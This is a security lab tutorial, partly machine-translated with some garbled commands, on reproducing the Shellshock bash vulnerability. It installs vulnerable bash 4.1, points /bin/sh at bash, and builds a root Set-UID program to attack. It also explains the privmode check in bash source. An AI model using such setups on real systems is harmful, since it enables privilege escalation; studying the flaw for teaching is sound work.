ShellShock challenge experiments
September 24, 2014, Bash found a serious flaw shellshock, the vulnerability can be used in many systems, both remotely and can also be triggered locally. In this experiment, students need to understand the attack personally reproduce the vulnerability, and answer some questions.
What is ShellShock?
Shellshock, also known as Bashdoor, is a security vulnerability Bash shell widely used in Unix is, for the first time on September 24, 2014 open. Many Internet daemons, such as web servers, using bash to process certain commands, allowing an attacker to execute arbitrary code on the vulnerable version of Bash. This can be exploited to access the computer system without authorization. - Excerpt from Wikipedia
1, built environment
Install version 4.1 bash with root privileges (at least version 4.2 of the holes have been plugged)
bash4.1 original download address is HTTP: //ftp/gnu.org/gnu/bash/bash-4.1.tar.gz , in order speed, here we use the following address http://labfile.oss.aliyuncs.com/bash-4.1.tar.gz download
download
sudo su
wget http://labfile.oss.aliyuncs.com/bash-4.1.tar.gz installation
$ tar xf bash-4.1.tar.gz
$ cd bash-4.1
$ ./configure #这一步过程比较长,请等待一会
$ make && make install
Learn bash custom function, the function name will only be able to call the function.
Attack Set-UID program
We know the system () function will be called "/ bin / sh -c" to run the specified command, this also means that / bin / bash is called, you can take advantage of loopholes to get permission shellshock it? First, make sure you have bash version with loopholes, and make / bin / sh points to / bin / bash.
$ LN -sf sudo / bin / bash / bin / sh
to create a new shock.c file in / home / shiyanlou directory :
vi shock.c Entry
#include <stdio.h>
void main()
{
setuid(geteuid()); // make real uid = effective uid.
system("/bin/ls -l");
} Compile the code, and set it to Set-UID program to ensure that it is owned by root.
$ sudo su
$ gcc -o shock shock.c
$ chmod u+s shock 
我们注意到这里使用了setuid(geteuid()) 来使real uid = effective uid,这在Set-UID程序中不是普遍现象,但它确实有时会发生。 先自己试着hack一下:) 以下是hack过程
如果 setuid(geteuid()) 语句被去掉了,再试试看攻击,并不能拿到权限
这就说明如果 real uid 和 effective uid 相同的话,定义在环境变量中的内容在该程序内有效,那样shellshock漏洞就能够被利用了。但是如果两个 uid 不同的话,环境变量失效,就无法发动攻击了,这可以从 bash的源代码中得到印证(variables.c,在308到369行之间)请指出是哪一行导致了这样的不同,并说明bash这样设计的原因。
摘出其中关键部分并简化
void initialize_shell_variables(){
// 循环遍历所有环境变量
for (string_index = 0; string = env[string_index++]; ) {
/*...*/
/* 如果有export过的函数, 在这里定义 */
/* 无法导入在特权模式下(root下)定义的函数 */
if (privmode == 0 && read_but_dont_execute == 0 &&
STREQN (“() {“, string, 4)) {
[...]
// 这里是shellshock发生的地方
// 传递函数定义 + 运行额外的指令
parse_and_execute (temp_string, name,
SEVAL_NONINT|SEVAL_NOHIST);
[...]
} } 上述那一行判断逻辑导致了两者的不同,primode即私有模式,要求real uid 与 effective uid保持一致。